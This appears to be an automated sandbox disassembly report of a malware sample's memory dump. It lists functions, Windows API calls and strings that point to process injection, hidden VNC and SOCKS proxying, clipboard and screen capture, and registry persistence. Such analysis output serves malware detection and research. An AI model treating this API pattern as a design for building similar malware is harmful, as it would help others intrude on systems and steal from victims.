Function 00035A94, Relevance: 9.1, APIs: 6, Instructions: 54

APIs

GetUpdateRgn.USER32(?,?,?), ref: 00035B1C

Part of subcall function 0004262D: WaitForSingleObject.KERNEL32(00000000,0003776D), ref: 00042635

TlsGetValue.KERNEL32 ref: 00035AB4
SetRectRgn.GDI32(?,?,?,?,?), ref: 00035AD4
SaveDC.GDI32(?), ref: 00035AE4
SendMessageW.USER32(?,00000014,?,00000000), ref: 00035AF4
RestoreDC.GDI32(?,00000000), ref: 00035B06

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 00044660, Relevance: 9.1, APIs: 6, Instructions: 53

APIs

CryptAcquireContextW.ADVAPI32(00048C87,00000000,00000000,00000001,F0000040,?,00048C87,?,00000030,?,?,?,000491A0,00053EC0), ref: 00044679
CryptCreateHash.ADVAPI32(00048C87,00008003,00000000,00000000,00000030,?,00048C87,?,00000030,?,?,?,000491A0,00053EC0), ref: 00044691
CryptHashData.ADVAPI32(00000030,00000010,00048C87,00000000,?,00048C87), ref: 000446AD
CryptGetHashParam.ADVAPI32(00000030,00000002,00000030,00000010,00000000,?,00048C87), ref: 000446C5
CryptDestroyHash.ADVAPI32(00000030,?,00048C87), ref: 000446DC
CryptReleaseContext.ADVAPI32(00048C87,00000000,?,00048C87,?,00000030,?,?,?,000491A0,00053EC0), ref: 000446E6

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 00036010, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 189

APIs

GetTickCount.KERNEL32(0000271B,00020000,00000000,00002719,00020000,00000000,00000000,000000FF,00000000), ref: 0003610F
GetUserNameExW.SECUR32(00000002,?,00000104), ref: 000361E6

Part of subcall function 000370A6: GetVersionExW.KERNEL32(?,?,00000000,00000006), ref: 000370CA
Part of subcall function 000370A6: GetNativeSystemInfo.KERNEL32(?), ref: 000370D8

GetUserDefaultUILanguage.KERNEL32(0000271C,00020000,?,00000000,000000FF,00000000), ref: 00036162
GetModuleFileNameW.KERNEL32(00000000,?,00000103,00000000,000000FF,00000000), ref: 000361A4

Part of subcall function 000433BB: HeapFree.KERNEL32(00000000,00000000,00044BB2), ref: 000433CE

Part of subcall function 000434BD: GetSystemTime.KERNEL32(?,?,?,000360C8,00000000,000000FF,00000000), ref: 000434C7
Part of subcall function 000434BD: SystemTimeToFileTime.KERNEL32(?,000000FF,?,?,000360C8,00000000,000000FF,00000000), ref: 000434D5

Part of subcall function 000434E5: GetTimeZoneInformation.KERNEL32(?), ref: 000434F4

Strings

, xrefs: 00036218

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 00037125, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 64

APIs

ConvertSidToStringSidW.ADVAPI32(?,?), ref: 00037138

Part of subcall function 000440AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 000440CF

LocalFree.KERNEL32(?,.exe,00000000), ref: 000371C0

Part of subcall function 000474DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,00037194,?,?,00000104,.exe,00000000), ref: 000474F4
Part of subcall function 000474DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,00037194,?,?,00000104), ref: 00047575

PathUnquoteSpacesW.SHLWAPI(?), ref: 000371A0
ExpandEnvironmentStringsW.KERNEL32(?,0004D23A,00000104), ref: 000371AD

Strings

.exe, xrefs: 00037147

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 00044F8F, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46

APIs

InternetOpenA.WININET(?,?,00000000,00000000,00000000), ref: 00044FA6
InternetSetOptionA.WININET(00000000,00000002,0005200C,00000004), ref: 00044FC5
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00044FE2
InternetCloseHandle.WININET(00000000), ref: 00044FEE

Strings

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1), xrefs: 00044F97, 00044FA5

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 00045403, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44

APIs

LoadLibraryA.KERNEL32(urlmon.dll), ref: 00045414
GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 00045427
FreeLibrary.KERNEL32(?), ref: 00045479

Strings

ObtainUserAgentString, xrefs: 00045421
urlmon.dll, xrefs: 0004540D

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 0003748F, Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 207

APIs

lstrcmpiA.KERNEL32(?,socks,?,00000000,00000104), ref: 000374BE
lstrcmpiA.KERNEL32(?,vnc), ref: 000374D1

Part of subcall function 00047425: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00047444
Part of subcall function 00047425: CloseHandle.KERNEL32(?), ref: 00047450

Part of subcall function 00047477: SetLastError.KERNEL32(0000009B,00042AC8,00000000,0003BB5F,00000000,00052AF0,00000000,00000104,76C605D7,00000000), ref: 00047481
Part of subcall function 00047477: CreateThread.KERNEL32(00000000,00052AF0,00052AF0,00052AF0,00000000,00000000), ref: 000474A4

Part of subcall function 0004675E: shutdown.WS2_32(00000000,00000002), ref: 00046766
Part of subcall function 0004675E: #3.WS2_32(00000000), ref: 0004676D

Part of subcall function 000474BC: WaitForMultipleObjects.KERNEL32(?,00052AEC,00000001,000000FF), ref: 000474CE

CloseHandle.KERNEL32(?), ref: 000376EE

Part of subcall function 000433BB: HeapFree.KERNEL32(00000000,00000000,00044BB2), ref: 000433CE

Part of subcall function 00046B8E: ReleaseMutex.KERNEL32(00000000,00043021,?,?,?), ref: 00046B92

Part of subcall function 00046444: getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 00046463
Part of subcall function 00046444: freeaddrinfo.WS2_32(?,76C53E72,?,?,?,00037518,?), ref: 000464B0

Part of subcall function 000467B6: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 000467CC

Part of subcall function 00046774: WSAIoctl.WS2_32(?,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 000467A7

Part of subcall function 0004666B: select.WS2_32(00000000,?,00000000,00000000,?), ref: 000466EA
Part of subcall function 0004666B: WSASetLastError.WS2_32(0000274C), ref: 000466F9

Part of subcall function 0004636E: recv.WS2_32(?,?,00000004,00000000), ref: 00046392

Part of subcall function 0004338B: HeapAlloc.KERNEL32(00000008,-00000004,00044B59,00000000,?,?,?,00041E08,00000000,000422ED,?,?,00000000), ref: 0004339C

Strings

socks, xrefs: 000374B7
vnc, xrefs: 000374CA

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 00039D55, Relevance: 7.7, APIs: 5, Instructions: 202

APIs

Part of subcall function 0004338B: HeapAlloc.KERNEL32(00000008,-00000004,00044B59,00000000,?,?,?,00041E08,00000000,000422ED,?,?,00000000), ref: 0004339C

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008), ref: 00039E0C
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00039E37
RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?,?,?,000000FF,?,?,000000FF,?,?,000000FF), ref: 00039ED7

Part of subcall function 000440AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 000440CF

Part of subcall function 00047607: RegQueryValueExW.KERNEL32(?,?,00000000,?,00049E26,?,?,?,000475CD,?,?,00000000,00000004,?), ref: 0004761F
Part of subcall function 00047607: RegCloseKey.KERNEL32(?,?,000475CD,?,?,00000000,00000004,?,?,?,?,00049E26,?,?), ref: 0004762D

RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF), ref: 00039F7A
RegCloseKey.ADVAPI32(?), ref: 00039F8D

Part of subcall function 000433BB: HeapFree.KERNEL32(00000000,00000000,00044BB2), ref: 000433CE

Part of subcall function 000474DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,00037194,?,?,00000104,.exe,00000000), ref: 000474F4
Part of subcall function 000474DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,00037194,?,?,00000104), ref: 00047575

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 00038E1B, Relevance: 7.7, APIs: 5, Instructions: 158

APIs

Part of subcall function 00048C40: PathCombineW.SHLWAPI(00041F45,00041F45,?), ref: 00048C5F

Part of subcall function 0004338B: HeapAlloc.KERNEL32(00000008,-00000004,00044B59,00000000,?,?,?,00041E08,00000000,000422ED,?,?,00000000), ref: 0004339C

GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 00038E82
GetPrivateProfileStringW.KERNEL32(00000000,?,00000000,000000FF,000000FF,?), ref: 00038F16
GetPrivateProfileIntW.KERNEL32(00000015,?,00000015,?), ref: 00038F34
GetPrivateProfileStringW.KERNEL32(00000000,?,00000000,?,000000FF,?), ref: 00038F5F
GetPrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000,000000FF,?), ref: 00038F7B

Part of subcall function 000440AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 000440CF

Part of subcall function 000433BB: HeapFree.KERNEL32(00000000,00000000,00044BB2), ref: 000433CE

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 00049224, Relevance: 7.6, APIs: 5, Instructions: 111

APIs

CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000004,00000080,00000000), ref: 00049245

Part of subcall function 000486EF: GetFileSizeEx.KERNEL32(0004925C,0004925C,?,?,?,0004925C,00000000), ref: 000486FB

ReadFile.KERNEL32(?,?,00000005,00000000,00000000), ref: 00049286
CloseHandle.KERNEL32(?), ref: 00049292
ReadFile.KERNEL32(?,?,00000005,00000005,00000000), ref: 00049301
SetEndOfFile.KERNEL32(?,?,?,?,00000000), ref: 00049327

Part of subcall function 0004869F: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000), ref: 000486B1

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 00049959, Relevance: 7.6, APIs: 5, Instructions: 99

APIs

Part of subcall function 0004338B: HeapAlloc.KERNEL32(00000008,-00000004,00044B59,00000000,?,?,?,00041E08,00000000,000422ED,?,?,00000000), ref: 0004339C

GetDIBits.GDI32(00000000,0003DE4B,00000000,00000001,00000000,00000000,00000000), ref: 00049991
GetDIBits.GDI32(00000000,0003DE4B,00000000,00000001,00000000,00000000,00000000), ref: 000499A7
DeleteObject.GDI32(0003DE4B), ref: 000499B4
CreateDIBSection.GDI32(00000000,00000000,00000000,00052888,?,?), ref: 00049A24

Part of subcall function 000433BB: HeapFree.KERNEL32(00000000,00000000,00044BB2), ref: 000433CE

DeleteObject.GDI32(0003DE4B), ref: 00049A43

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 0004B3EC, Relevance: 7.6, APIs: 5, Instructions: 85

APIs

Part of subcall function 00048C40: PathCombineW.SHLWAPI(00041F45,00041F45,?), ref: 00048C5F

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 0004B437
WriteFile.KERNEL32(0004B3D4,?,00000146,?,00000000), ref: 0004B475
WriteFile.KERNEL32(0004B3D4,?,00000000,?,00000000), ref: 0004B499
FlushFileBuffers.KERNEL32(0004B3D4), ref: 0004B4AD
CloseHandle.KERNEL32(0004B3D4), ref: 0004B4B6

Part of subcall function 00048716: SetFileAttributesW.KERNEL32(00000080,00000080,0004B4CD,?), ref: 0004871F
Part of subcall function 00048716: DeleteFileW.KERNEL32(?), ref: 00048729

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 0004C49B, Relevance: 7.6, APIs: 5, Instructions: 85

APIs

Part of subcall function 0004262D: WaitForSingleObject.KERNEL32(00000000,0003776D), ref: 00042635

GetProcessId.KERNEL32(?), ref: 0004C509

Part of subcall function 0004245B: CreateMutexW.KERNEL32(00052C30,00000001,?,00052E70,76C605D7,?,00000002,?,76C605D7), ref: 000424A3
Part of subcall function 0004245B: GetLastError.KERNEL32 ref: 000424AF
Part of subcall function 0004245B: CloseHandle.KERNEL32(00000000), ref: 000424BD

Part of subcall function 00042542: DuplicateHandle.KERNEL32(000000FF,?,00000000,?,00000000,00000000,00000002), ref: 00042574
Part of subcall function 00042542: WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,?,?,?,0004316D,?,00000000,?,?,00000000), ref: 000425AB
Part of subcall function 00042542: WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,?,?,?,0004316D,?,00000000,?,?,00000000), ref: 000425CB
Part of subcall function 00042542: VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000,00000000,?,00000000,?,?,?,?,0004316D,?,00000000), ref: 0004261A

GetThreadContext.KERNEL32 ref: 0004C557
SetThreadContext.KERNEL32(00000000,00000000), ref: 0004C596
VirtualFreeEx.KERNEL32(?,00000000,00000000,00008000), ref: 0004C5AD
CloseHandle.KERNEL32(?), ref: 0004C5B7

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 00035DFB, Relevance: 7.6, APIs: 5, Instructions: 80

APIs

GetWindowInfo.USER32(?,?), ref: 00035E1A
IntersectRect.USER32(?,?), ref: 00035E58
IsRectEmpty.USER32(?), ref: 00035E6A
IntersectRect.USER32(?,?), ref: 00035E81

Part of subcall function 00035C8A: GetWindowThreadProcessId.USER32(?,?), ref: 00035CB4
Part of subcall function 00035C8A: ResetEvent.KERNEL32(00000010), ref: 00035D03
Part of subcall function 00035C8A: PostMessageW.USER32(?,?,?,00000010), ref: 00035D26
Part of subcall function 00035C8A: WaitForSingleObject.KERNEL32(00000010,00000064), ref: 00035D35
Part of subcall function 00035C8A: ResetEvent.KERNEL32(?,?,?,00000010), ref: 00035D60
Part of subcall function 00035C8A: PostThreadMessageW.USER32(?,?,000000FC,?), ref: 00035D70
Part of subcall function 00035C8A: WaitForSingleObject.KERNEL32(?,000003E8), ref: 00035D82
Part of subcall function 00035C8A: TerminateProcess.KERNEL32(?,00000000,?,00000010), ref: 00035DA7
Part of subcall function 00035C8A: IntersectRect.USER32(?,?), ref: 00035DC7
Part of subcall function 00035C8A: FillRect.USER32(?,?,00000006), ref: 00035DD9
Part of subcall function 00035C8A: DrawEdge.USER32(?,?,0000000A,0000000F), ref: 00035DED

GetTopWindow.USER32(?), ref: 00035EB1

Part of subcall function 00047AC1: GetWindow.USER32(?,00000001), ref: 00047AE3

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 0003BBD5, Relevance: 7.6, APIs: 5, Instructions: 72

APIs

GetCurrentThread.KERNEL32(00000000), ref: 0003BBE0
SetThreadPriority.KERNEL32(00000000), ref: 0003BBE7

Part of subcall function 00042507: CreateMutexW.KERNEL32(00052C30,00000000,?,?,?,?,?), ref: 00042528

Part of subcall function 00042828: PathRenameExtensionW.SHLWAPI(?,.dat), ref: 000428A1

PathQuoteSpacesW.SHLWAPI(?), ref: 0003BC2A

Part of subcall function 0004262D: WaitForSingleObject.KERNEL32(00000000,0003776D), ref: 00042635

WaitForSingleObject.KERNEL32(000000C8), ref: 0003BC62

Part of subcall function 0004763A: RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,00000002,00000000,00000004,00000000,80000001,?,?,00049EAB,?,?,00000004), ref: 00047658
Part of subcall function 0004763A: RegSetValueExW.KERNEL32(00000004,00000004,00000000,?,?,00049EAB,?,?,00049EAB,?,?,00000004,?,00000004), ref: 00047672
Part of subcall function 0004763A: RegCloseKey.ADVAPI32(00000004,?,?,00049EAB,?,?,00000004,?,00000004), ref: 00047681

WaitForSingleObject.KERNEL32(000000C8,?), ref: 0003BC98

Part of subcall function 00046B8E: ReleaseMutex.KERNEL32(00000000,00043021,?,?,?), ref: 00046B92

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 0004B062, Relevance: 7.6, APIs: 5, Instructions: 70

APIs

GetClipboardData.USER32(?), ref: 0004B06B

Part of subcall function 0004262D: WaitForSingleObject.KERNEL32(00000000,0003776D), ref: 00042635

GlobalLock.KERNEL32(00000000), ref: 0004B09F
EnterCriticalSection.KERNEL32(00053FB4,00000000,00000000), ref: 0004B0DF

Part of subcall function 0004AD5F: EnterCriticalSection.KERNEL32(00053FB4,?,?,?,0004B052,?), ref: 0004AD7C
Part of subcall function 0004AD5F: LeaveCriticalSection.KERNEL32(00053FB4,?,?,?,0004B052,?), ref: 0004AD9D
Part of subcall function 0004AD5F: EnterCriticalSection.KERNEL32(00053FB4,?,?,?,?,0004B052,?), ref: 0004ADAE
Part of subcall function 0004AD5F: LeaveCriticalSection.KERNEL32(00053FB4,?,?,?,0004B052,?), ref: 0004AE47

LeaveCriticalSection.KERNEL32(00053FB4,00000000,00034A68), ref: 0004B0F6

Part of subcall function 000433BB: HeapFree.KERNEL32(00000000,00000000,00044BB2), ref: 000433CE

GlobalUnlock.KERNEL32(?), ref: 0004B109

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 000468E0, Relevance: 7.6, APIs: 5, Instructions: 63

APIs

socket.WS2_32(000000FF,00000002,00000000), ref: 000468F2
WSAIoctl.WS2_32(00000000,48000016,00000000,00000000,00020000,00000000,00020000,00000000,00000000), ref: 0004691C
WSAGetLastError.WS2_32 ref: 00046923

Part of subcall function 0004338B: HeapAlloc.KERNEL32(00000008,-00000004,00044B59,00000000,?,?,?,00041E08,00000000,000422ED,?,?,00000000), ref: 0004339C

WSAIoctl.WS2_32(00000000,48000016,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0004694F

Part of subcall function 000433BB: HeapFree.KERNEL32(00000000,00000000,00044BB2), ref: 000433CE

#3.WS2_32(?), ref: 00046963

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 00048A29, Relevance: 7.6, APIs: 5, Instructions: 61

APIs

Part of subcall function 00048C40: PathCombineW.SHLWAPI(00041F45,00041F45,?), ref: 00048C5F

FindFirstFileW.KERNEL32(?,?,?,?), ref: 00048A5A

Part of subcall function 00048716: SetFileAttributesW.KERNEL32(00000080,00000080,0004B4CD,?), ref: 0004871F
Part of subcall function 00048716: DeleteFileW.KERNEL32(?), ref: 00048729

FindNextFileW.KERNEL32(00000000,?), ref: 00048AB5
FindClose.KERNEL32(00000000), ref: 00048AC0
SetFileAttributesW.KERNEL32(?,00000080,?,?), ref: 00048ACC
RemoveDirectoryW.KERNEL32(?), ref: 00048AD3

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 00035A01, Relevance: 7.6, APIs: 5, Instructions: 56

APIs

GetUpdateRect.USER32(?,?,?), ref: 00035A88

Part of subcall function 0004262D: WaitForSingleObject.KERNEL32(00000000,0003776D), ref: 00042635

TlsGetValue.KERNEL32 ref: 00035A21
SaveDC.GDI32(?), ref: 00035A51
SendMessageW.USER32(?,00000014,?,00000000), ref: 00035A61
RestoreDC.GDI32(?,00000000), ref: 00035A73

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 00035BF6, Relevance: 7.5, APIs: 5, Instructions: 48

APIs

GetCurrentThread.KERNEL32(00000001,?,?,?,?,?,?,?,?,000430F6), ref: 00035C03
SetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,?,?,000430F6), ref: 00035C0A
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,000430F6), ref: 00035C1C

Part of subcall function 000354A9: GetWindowInfo.USER32(?,?), ref: 00035515
Part of subcall function 000354A9: IntersectRect.USER32(?,?,-00000114), ref: 00035538
Part of subcall function 000354A9: IntersectRect.USER32(?,?,-00000114), ref: 0003558E
Part of subcall function 000354A9: GetDC.USER32(00000000), ref: 000355D2
Part of subcall function 000354A9: CreateCompatibleDC.GDI32(00000000), ref: 000355E3
Part of subcall function 000354A9: ReleaseDC.USER32(00000000,00000000), ref: 000355ED
Part of subcall function 000354A9: SelectObject.GDI32(00000000,?), ref: 00035602
Part of subcall function 000354A9: DeleteDC.GDI32(00000000), ref: 00035610
Part of subcall function 000354A9: TlsSetValue.KERNEL32(?), ref: 0003565B
Part of subcall function 000354A9: EqualRect.USER32(?,?), ref: 00035675
Part of subcall function 000354A9: SaveDC.GDI32(00000000), ref: 00035680
Part of subcall function 000354A9: SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 0003569B
Part of subcall function 000354A9: SendMessageW.USER32(?,00000085,00000001,00000000), ref: 000356BB
Part of subcall function 000354A9: DefWindowProcW.USER32(?,00000317,00000000,00000002), ref: 000356CD
Part of subcall function 000354A9: RestoreDC.GDI32(00000000,?), ref: 000356E4
Part of subcall function 000354A9: SaveDC.GDI32(00000000), ref: 00035706
Part of subcall function 000354A9: SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0003571C
Part of subcall function 000354A9: SendMessageW.USER32(?,00000014,00000000,00000000), ref: 00035735
Part of subcall function 000354A9: RestoreDC.GDI32(00000000,?), ref: 00035743
Part of subcall function 000354A9: SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00035756
Part of subcall function 000354A9: SendMessageW.USER32(?,0000000F,00000000,00000000), ref: 00035766
Part of subcall function 000354A9: DefWindowProcW.USER32(?,00000317,00000000,00000004), ref: 00035778
Part of subcall function 000354A9: TlsSetValue.KERNEL32(00000000), ref: 00035792
Part of subcall function 000354A9: SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 000357B2
Part of subcall function 000354A9: DefWindowProcW.USER32(00000004,00000317,00000000,0000000E), ref: 000357CE
Part of subcall function 000354A9: SelectObject.GDI32(00000000,?), ref: 000357E4
Part of subcall function 000354A9: DeleteDC.GDI32(00000000), ref: 000357EB
Part of subcall function 000354A9: SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 00035813
Part of subcall function 000354A9: PrintWindow.USER32(00000008,00000000,00000000), ref: 00035829

SetEvent.KERNEL32(00052868,?,00000001), ref: 00035C69
GetMessageW.USER32(?,000000FF,00000000,00000000), ref: 00035C76

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 0003B0AD, Relevance: 7.5, APIs: 5, Instructions: 32

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0003B0B3
ReleaseMutex.KERNEL32(?), ref: 0003B0E7
IsWindow.USER32(?), ref: 0003B0EE
PostMessageW.USER32(?,00000215,00000000,?), ref: 0003B108
SendMessageW.USER32(?,00000215,00000000,?), ref: 0003B110

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 000398B9, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94

APIs

Part of subcall function 000474DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,00037194,?,?,00000104,.exe,00000000), ref: 000474F4
Part of subcall function 000474DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,00037194,?,?,00000104), ref: 00047575

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008), ref: 0003991B
SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0003996B

Part of subcall function 00048AE4: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00048B23
Part of subcall function 00048AE4: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00048B4A
Part of subcall function 00048AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 00048B94
Part of subcall function 00048AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 00048BC1
Part of subcall function 00048AE4: Sleep.KERNEL32(00000000,?,?), ref: 00048BF1
Part of subcall function 00048AE4: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 00048C1F
Part of subcall function 00048AE4: FindClose.KERNEL32(?,?,?,?,00000000), ref: 00048C31

Part of subcall function 000433BB: HeapFree.KERNEL32(00000000,00000000,00044BB2), ref: 000433CE

Strings

#, xrefs: 00039951
&, xrefs: 0003994A

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 00039009, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94

APIs

Part of subcall function 000474DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,00037194,?,?,00000104,.exe,00000000), ref: 000474F4
Part of subcall function 000474DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,00037194,?,?,00000104), ref: 00047575

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008), ref: 0003906B
SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?), ref: 000390BB

Part of subcall function 00048AE4: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00048B23
Part of subcall function 00048AE4: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00048B4A
Part of subcall function 00048AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 00048B94
Part of subcall function 00048AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 00048BC1
Part of subcall function 00048AE4: Sleep.KERNEL32(00000000,?,?), ref: 00048BF1
Part of subcall function 00048AE4: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 00048C1F
Part of subcall function 00048AE4: FindClose.KERNEL32(?,?,?,?,00000000), ref: 00048C31

Part of subcall function 000433BB: HeapFree.KERNEL32(00000000,00000000,00044BB2), ref: 000433CE

Strings

#, xrefs: 00039093
&, xrefs: 000390A1

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 00042828, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 52

APIs

Part of subcall function 000435C6: MultiByteToWideChar.KERNEL32(00042884,00000000,?,00041FF2,?,7718F8FF,00042884,00000000,00000032,?,7718F8FF,00000000), ref: 000435DD

Part of subcall function 00048C40: PathCombineW.SHLWAPI(00041F45,00041F45,?), ref: 00048C5F

PathRenameExtensionW.SHLWAPI(?,.dat), ref: 000428A1

Strings

C:\Users\admin\AppData\Roaming, xrefs: 00042870, 00042888
.dat, xrefs: 0004289B
SOFTWARE\Microsoft, xrefs: 00042855

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 0003E0FB, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47

APIs

GetCurrentThreadId.KERNEL32(7718F8FF), ref: 0003E108
